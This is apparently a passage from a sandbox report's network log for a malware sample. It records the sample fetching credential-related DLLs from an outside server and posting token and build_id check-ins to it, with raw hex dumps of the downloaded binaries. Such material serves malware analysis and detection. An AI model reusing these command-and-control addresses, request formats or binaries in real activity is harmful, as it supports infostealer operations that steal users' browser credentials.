8           192.168.2.6  49995        95.217.220.103  443               6484  C:\Users\user\Desktop\7ZthFNAqYp.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-23 05:03:19 UTC  195                OUT        GET /sqlp.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 05:03:20 UTC  264                IN         HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 05:03:19 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: close
Last-Modified: Wednesday, 23-Oct-2024 05:03:19 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                            Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$
                                                                                                                                                                                                            2024-10-23 05:03:25 UTC16384INDELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count(*) FROM %Q.'%q_%s'tokencharsseparatorsL* N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED]
                                                                                                                                                                                                            r:Y<|=>MbP?|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED]
                                                                                                                                                                                                            i"
                                                                                                                                                                                                            i"$i"0i"8i"Di"Pi"\i"hi"
                                                                                                                                                                                                            xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"*n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED]
                                                                                                                                                                                                            9/I?hKd?81UH!G?#$0|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?*llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!*87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED]
                                                                                                                                                                                                            !5ACPRSWYlm pr

                                                                                                                                                                                                            )Y*"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49997 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:26 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 829
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 05:03:26 UTC | 829 | OUT | Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------CFCFHJDBKJKEBFHJEHIICont
2024-10-23 05:03:47 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 05:03:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-23 05:03:47 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 50000 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:40 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGII
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 05:03:40 UTC | 437 | OUT | Data Ascii: ------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------GIIDBGDAFHJDHIDGDGIICont
2024-10-23 05:03:41 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 05:03:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-23 05:03:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 50001 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:43 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 05:03:43 UTC | 437 | OUT | Data Ascii: ------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------EHCFBFBAEBKJKEBGCAEHCont
2024-10-23 05:03:44 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 05:03:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-23 05:03:44 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 50002 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:45 UTC | 198 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 05:03:45 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 05:03:45 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: close
Last-Modified: Wednesday, 23-Oct-2024 05:03:45 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                            Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: 00 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9
                                                                                                                                                                                                            Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: c4 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00
                                                                                                                                                                                                            Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: 8b 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff
                                                                                                                                                                                                            Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: 77 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98
                                                                                                                                                                                                            Data Ascii: w8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: e8 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01
                                                                                                                                                                                                            Data Ascii: ,0<48%8A)$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 50003 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:47 UTC | 198 | OUT | GET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
2024-10-23 05:03:47 UTC | 263 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:47 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 608080
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Wednesday, 23-Oct-2024 05:03:47 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 50004 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:49 UTC | 199 | OUT | GET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
2024-10-23 05:03:49 UTC | 263 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:49 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 450024
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Wednesday, 23-Oct-2024 05:03:49 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: 6a 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74
                                                                                                                                                                                                            Data Ascii: jatAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: 85 c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00
                                                                                                                                                                                                            Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: f0 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e
                                                                                                                                                                                                            Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: e8 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7
                                                                                                                                                                                                            Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06
                                                                                                                                                                                                            Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv
                                                                                                                                                                                                            2024-10-23 05:03:50 UTC16384INData Raw: f6 e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57
                                                                                                                                                                                                            Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 50005 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:51 UTC | 199 | OUT | GET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
2024-10-23 05:03:51 UTC | 263 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:51 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 257872
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Wednesday, 23-Oct-2024 05:03:51 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 50006 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:03:53 UTC | 203 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
2024-10-23 05:03:53 UTC | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:53 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 80880
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Wednesday, 23-Oct-2024 05:03:53 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 50007 | 95.217.220.103 | 443 | 6484 | C:\Users\user\Desktop\7ZthFNAqYp.exe
Timestamp | Bytes transferred | Direction | Data
